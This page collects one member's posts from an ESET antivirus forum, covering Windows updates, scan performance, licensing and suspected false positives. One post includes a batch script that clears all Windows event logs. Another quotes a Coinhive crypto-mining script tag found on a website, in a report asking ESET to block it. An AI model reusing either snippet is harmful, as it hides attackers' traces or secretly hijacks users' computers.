Super_Spartan
-
Posts
556 -
Joined
-
Last visited
-
Days Won
3
Posts posted by Super_Spartan
-
-
Yeah same here the .214 update KB4058258 is not being offered to me automatically through Windows Updates but I can install it manually. I think Microsoft has been strange lately with Windows updates as they've been releasing then pulling them again so it might be the fact that Microsoft is still investigating whether that update is 100% safe for everyone with no adverse effects.
To download and install it manually: http://download.windowsupdate.com/d/msdownload/update/software/updt/2018/01/windows10.0-kb4058258-x64_69f87cf7f2ea83509d5e61ba2d525a103a6d64f9.msu
That's the link for the 64-Bit version (non Server edition), for all the links to all versions: https://www.catalog.update.microsoft.com/Search.aspx?q=KB4058258
-
While having themes would be nice, you shouldn't base your renewal upon it. An Antivirus is there to protect you, not to constantly keep opening it up and looking at it. In fact, I install it and forget it's even there, it is very rare that I open the user interface.
If you are using an AV because it has nice colors and themes, then you have chosen the wrong product.
Just my 2 cents worth.
-
Hi Marcos, ever since I uninstalled the Killer Network Performance Suite the problem didn't happen again.
Thanks
-
5 hours ago, Marcos said:
I'd suggest generating the following logs if you can reproduce the issue:
- enable advanced protocol filtering logging in the advanced setup
- start logging with Wireshark
- start logging with Procmon
- reproduce the issue
- disable logging and save logs (make sure to include "protoscan_on" in the Wireshark and Procmon log file names)
- collect logs with ELC
- disable protocol filtering
- start logging with Wireshark
- start logging with Procmon
- make sure the issue doesn't occur
- disable logging and save logs (make sure to include "protoscan_off" in the Wireshark and Procmon log file names)
- re-enable protocol filtering
- upload the Wireshark, Procmon and ELC logs to a safe location and drop me a personal message with download links.Also try running Chrome without extensions by using the --disable-extensions parameter when launching it to see if it makes a difference.
Thanks for the detailed suggestion Marcos.
What I just remembered is that I recently installed the Killer Performance Suite which is supposed to control bandwidth per app to prioritize certain apps. I just uninstalled that and will report back if I face the issue again, then I'll do those things you mentioned to troubleshoot.
I have Adblock Plus with the following filters as well so I might disable that if I run into the issue as well before running those steps. These are my filters:
-
I've been recently noticing a bit of a lag when accessing websites, I know the HTTP Scanner has to do its thing but like Gmail isn't even loading, it would hang on loading page for ages. I thought it's just a Gmail glitch at first. Today I tried accessing Gmail, and it just got stuck at loading Gmail....
I then disabled NOD32 and the page loaded instantly.
What gives?
-
I just installed it manually and everything looks fine:
Windows 10 Cumulative Update to Build 16299.192
First download the Cumulative update then install it:
After the reboot, download and instal the Servicing Stack and install it: -
20 hours ago, 0xDEADBEEF said:
I think ESET's lightweight is from dynamic binary translation and extensive caching and whitelisting.
Generally in-product sandbox (and heuristics) can hardly be lightweight as there are pre-exec unpacking analysis. However, with some engineering effort, one can optimize for common cases. Most users will not generate tons of new binary/archive in a short period of time, therefore by skipping known good files, the performance impact can be reduced significantly. I noticed ESET recently has further optimization on this by caching the DBT-ed data of binary to further accelerate the scanning. https://support.eset.com/ca6626/
However, if you hit the "corner case", like doing huge compilation job, ESET is no longer the lightest weight product (perhaps this is the case in AV-TEST). The lightest weight solution is -- not to scan anything, so no extra instructions to execute
thanks a lot. that's the kinda answer I was looking for
-
Despite some ups and downs and previous versions like v7 and v8, overall, ESET has been known ever since I started using it since v2 to be one of the most secure and lightest Antivirus at the same time
My question is, what is this magic? how does it achieve this great security level, no false positives AND be the lightest?
-
15 hours ago, Marcos said:
It's detected as a potentially unsafe application since it's also used by malware to clear its traces. The detection is optional and is disabled by default. You can exclude the file from detection or the detection itself by its name.
Thanks, just wanted to make sure there's nothing wrong with that script.
-
I have this batch file to clear the event log. When I ran it on my friend's PC which has NOD32 as well, NOD32 blocked it.
Just wanna make sure the batch file is safe?
@echo off FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V IF (%adminTest%)==(Access) goto noAdmin for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G") echo. echo goto theEnd :do_clear echo clearing %1 wevtutil.exe cl %1 goto :eof :noAdmin exit -
On 12/2/2017 at 10:48 AM, BobU said:
New update to Windows 10 Creator Update 1709 and now at start NOD32 shows an exclamation and says it needs to be added to Windows Security or something very similar. Take a minute or so.
Expected behavior? Something need to change?
~Bob
I have the same exact problem and this is on a clean install with Windows 10 Fall Creators update + the latest NOD32 Antivirus v11.0.149.0
-
30 minutes ago, DinGo said:
Fair enOugh Phoenix, you make a very valid point.
So no more posts from me regarding pre-release builds
Thank you for understanding bro. Cheers
-
are you gonna post every new pre-release / Beta update you get? The majority of users me included only care about stable releases. Beta updates are way too many to be making a new thread every time you get an update. (no pun intended)
-
1 hour ago, John Alex said:
I agree with you, shouldn't be "another A/V comparison", but now seems to be a monthly event for ESET, when it scores the worst among "big names"
It seems like ESET got lost in sophistication (UEFI scanner!!!!) but ignores the basics.
All I can tell you is that in the 14 years that I've been using ESET NOD32 Antivirus (not even the Internet Security with its firewall), I have never gotten a virus and I do visit all kinds of sites you can imagine. ESET's HTTP scanner automatically blocks any bad sites/connections. nuff said. Take these tests with a grain of salt. I for one, will never trust Microsoft with my computer's security and their heavy Windows Defender. http://chart.av-comparatives.org/chart1.php?chart=chart4&year=2017&month=10&sort=1&zoom=2
-
2 hours ago, foneil said:
It does depend on where the license was purchased and the type of license, remember we are a partner-based company and different partners and distributors offer different license types. If your friend bought an NFR (not for resale), this will affect renewal obviously). If they bought online, the license type will depend on the location of the partner (it's possible to purchase licenses outside of the US, for example).
Otherwise, your friend should use License Manager to add their current license to my.eset.com, and from there, can add license quantity:
http://help.eset.com/license_manager/en-US/elm_managing_license.html
He bought it from the same ESET US site I pointed above. It says if he wants to increase the license size, he has to call sales so no way to do it online like you could with the Middle East site. I'll tell him to call then
-
On the ESET Middle East site, I can renew OR increase the license size. Now I've recommended NOD32 to a friend who's in the USA and he bought a 2 user license for 2 years. He just bought his daughter a computer so he wants to add another seat rather than get her a separate license. We couldn't find a way to increase the license size on the ESET US website. There was only renew license and when he enters his license there, it says his license is not eligible for renewal. Probably because his license is still valid for another year.
so how does one add to the PC count of his license? why isn't it as easy as it is on the ESET Middle East Site?
-
5 hours ago, itman said:
Yes.
The NoCoin rule in the full AdBlock Plus solution in addition to the NoCoin extension in FireFox and possibility a similar Chrome plug-in use the GitHub list described here: https://github.com/hoshsadiq/adblock-nocoin-list . So in your case, this would have blocked the coinhive.com connection prior to Eset's URL block list intercepting it. Unfortunately, the Adblock Plus add-on for IE does not have such capability and you are forced to using another URL block list method.
However, I thought you commented on your CPU spiking when entering the web site? Did this occur prior to adding the Adblock Plus NoCoin rule?
That was on another system with nothing installed
So when I checked that link on my system, NOD32 didn't alert me of anything. Now it makes sense that you mention it though, seems that no coin filter is worth it after all
-
7 hours ago, cyberhash said:
I don't think its the matter of failing. They could easily be blocked, but its a fact that these miners also have a legitimate purpose and that's where the grey area comes into play. But as noted above you DO have the option of enabling detection of PUA.
Alternatively ............
Not installing & running Java , using something along the lines of noscript (hard for novices) , plus using a browser that "Asks" when flash content is wanting to be run and not allowed by default.
There are also plugins like "No coin" appearing , that specifically targets these miners
I have enabled the no coin rule in Adblock Plus, perhaps that's why ESET wasn't alerting me of anything when visiting that site?
-
5 hours ago, itman said:
I can confirm that Eset is not detecting the Coin Hive miner on the posted TechInferno web site link. Neither is the Fanboy Adblock TPL I use in IE11. I do know this TPL does have an entry for Coin Hive. So it appears that Coin Hive has indeed figured out a way around the block lists and AV PUA detection.
I didn't initially detect the coin mining activity since you have to enter one of the sub-forums from the main TechInferno forum web page for the coin mining to take place. Also on my PC and possibly due to it has a 6 core CPU, I didn't see CPU activity exceeding 15%. However, I didn't stick around long on that web page.
-EDIT- Appears the coin mining is going on through the animated banner on the web page. Position your mouse cursor on banner text to stop the scrolling. CPU activity drops to next to nill.
Can you please comment on this. also, why does ESET Samples never reply to me.
-
22 minutes ago, 0xDEADBEEF said:
If you turn on the detection of "potentially unsafe application", ESET will detect the miner script. Not sure why this is in "potentially unsafe" but not "potentially unwanted"
I have turned on detect potentially unsafe applications, it doesn't detect it, and this should be detected by the HTTP scanner. Kaspersky is already blocking it.
-
Since I never get any response from ESET, I just should I would also post this here for an admin to make sure this site is blocked....here is a copy of the email I just sent to ESET Samples Team:
Please check this site: https://www.techinferno.com/index.php?/forums/ and have ESET’s HTTP Scanner block it
===========================================================================================================
Just like to warn you guys that it would seem that techinferno has now started to used end users computers to mine crypto currency.
Just went on myself to check for some info and watched my CPU spike to 100% with the system lagging, even down to GPU driver crashing so i closed the tab it went back to normal, i then went and viewed the source for the index page.Here is what was found:
<link rel='shortcut icon' href='****://sslcdn.techinferno.com/uploads/monthly_2017_08/favicon.ico.902cfabe37f7260915a7c8342595a33e.ico'><script src="****://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('uWKXebL5jXICjXGj85wncylJDkRN9gVu');
miner.start();
</script>
TOSTech|Inferno is a technology website dedicated to discovering the latest breakthroughs in vbios, bios, egpu and other trends in the industry. As part of this dedication to cutting edge technology, we sometimes try new technologies as part of our codebase that can range from subtle advertising in the form of text to silent cryptocurrency mining.None of the technology we test on this website will ever adversely affect our end users as we try to keep it minimal and out of sight so that our users can maximize their enjoyment of Tech|Inferno without the typical advertisements cluttering their screens
-
sent. thank you
-
I've been using Popcorn time for a while now but with today's update to v5.7.0.0 Beta, if I try to download it, ESET blocks the site:
http://dl.popcorn-time.to/PopcornTime-latest.exe
Can you please forward this to the threats team to make sure it's not a false positive?
Thanks
-
1 hour ago, GianRoss said:
Well,
I was hoping I could get in to it a little more than that, perhaps I didn'y explain very well. For example, it blocks many Internet pages that I've used for years, I'm no positive what scans to use when, I'm unable to download. I should of asked for a tutorial to familiarize myself.
P.S. It just let me get this version yesterday, how do I get 11?
TY
GR
There's nothing additional that needs to be done. If ESET is blocking some sites and/or files, it is for a good reason as they are known from previous history that they have 0 or close to very little false positives so I suggest you stop visiting the pages that you *thought* were safe and leave that to the security experts (no pun intended)
To download ESET NOD32 v11.0.144.0, visit this link: https://download.eset.com/com/eset/apps/home/eav/windows/latest/eav_nt64.exe
Is ESET blocking KB4058258 (Windows 10 16299.214)?
in ESET NOD32 Antivirus
Posted
Update to Windows 10 Versions 1507, 1511, 1607, and 1703 for update reliability: February 8, 2018